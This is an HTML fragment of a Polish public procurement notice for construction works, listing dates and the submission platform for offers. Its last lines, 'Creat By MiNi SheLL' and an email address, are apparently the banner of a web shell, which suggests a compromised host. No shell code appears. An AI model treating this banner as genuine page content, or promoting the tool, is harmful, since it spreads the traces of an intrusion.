class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-11 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferta oraz pozostałe oświadczenia i dokumenty, dla których Zamawiający określił wzory w formie formularzy zamieszczonych w załącznikach do SWZ przekazywane w formie elektronicznej za pośrednictwem https://platformazakupowa.pl/pn/zd_ilawa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-11 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-27 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com